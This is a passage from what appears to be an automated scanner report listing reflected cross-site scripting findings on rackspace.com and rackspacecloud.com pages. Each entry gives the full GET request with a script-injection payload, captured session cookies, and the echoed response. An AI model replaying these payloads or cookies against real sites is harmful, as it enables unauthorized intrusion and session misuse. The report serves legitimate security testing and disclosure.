This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /searchresults.php?q=bf622"><script>alert(1)</script>9a19425fe4 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... -wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/searchresults.php?q=bf622"><script>alert(1)</script>9a19425fe4&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.183. http://www.rackspace.com/sitemap.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /sitemap.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95a04"><script>alert(1)</script>84fad394893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap.php?95a04"><script>alert(1)</script>84fad394893=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... atinvite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/sitemap.php?95a04"><script>alert(1)</script>84fad394893=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.184. http://www.rackspace.com/sitemap404.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /sitemap404.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f665e"><script>alert(1)</script>87663995fe4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap404.php?f665e"><script>alert(1)</script>87663995fe4=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6288f"><script>alert(1)</script>43537466cbb was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... <a onclick="javascript:window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/sitemap404.php?url=/crossdomain.xml6288f"><script>alert(1)</script>43537466cbb&optionaldata3=cleanEntry&optionaldata4=US38d41377d7def08a22a9a00f4d26f41d&optionaldata5=2f0f5a4286904ef0a856f07e','custclient','width=500,height=320');return false;" target="custclient" sty ...[SNIP]...
4.186. http://www.rackspace.com/whyrackspace/expertise/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /whyrackspace/expertise/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ff99"><script>alert(1)</script>b24458cde80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whyrackspace/expertise/index.php?9ff99"><script>alert(1)</script>b24458cde80=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... click="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/expertise/index.php?9ff99"><script>alert(1)</script>b24458cde80=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.187. http://www.rackspace.com/whyrackspace/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /whyrackspace/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c0e"><script>alert(1)</script>8c1d50ab811 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whyrackspace/index.php?75c0e"><script>alert(1)</script>8c1d50ab811=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/index.php?75c0e"><script>alert(1)</script>8c1d50ab811=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.188. http://www.rackspace.com/whyrackspace/network/bandwidthbilling.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /whyrackspace/network/bandwidthbilling.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6d0"><script>alert(1)</script>a6f38532589 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whyrackspace/network/bandwidthbilling.php?1e6d0"><script>alert(1)</script>a6f38532589=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ack_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/network/bandwidthbilling.php?1e6d0"><script>alert(1)</script>a6f38532589=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.189. http://www.rackspace.com/whyrackspace/network/datacenters.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /whyrackspace/network/datacenters.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a38b"><script>alert(1)</script>f54df7eb482 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whyrackspace/network/datacenters.php?5a38b"><script>alert(1)</script>f54df7eb482=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/network/datacenters.php?5a38b"><script>alert(1)</script>f54df7eb482=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.190. http://www.rackspace.com/whyrackspace/network/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /whyrackspace/network/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d9"><script>alert(1)</script>dd3b2933cd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whyrackspace/network/index.php?601d9"><script>alert(1)</script>dd3b2933cd2=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/network/index.php?601d9"><script>alert(1)</script>dd3b2933cd2=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.191. http://www.rackspace.com/whyrackspace/support/fanati/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /whyrackspace/support/fanati/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f7b8"><script>alert(1)</script>be21f72e6fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /whyrackspace/support/fanati/index.php?8f7b8"><script>alert(1)</script>be21f72e6fc=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/fanati.php?8f7b8"><script>alert(1)</script>be21f72e6fc=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.192. http://www.rackspace.com/whyrackspace/support/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /whyrackspace/support/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 381a9"><script>alert(1)</script>b80af3942be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whyrackspace/support/index.php?381a9"><script>alert(1)</script>b80af3942be=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/whyrackspace/support/index.php?381a9"><script>alert(1)</script>b80af3942be=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.193. http://www.rackspacecloud.com/aboutus/contact/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /aboutus/contact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eab9"><script>alert(1)</script>0c9c0306586 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
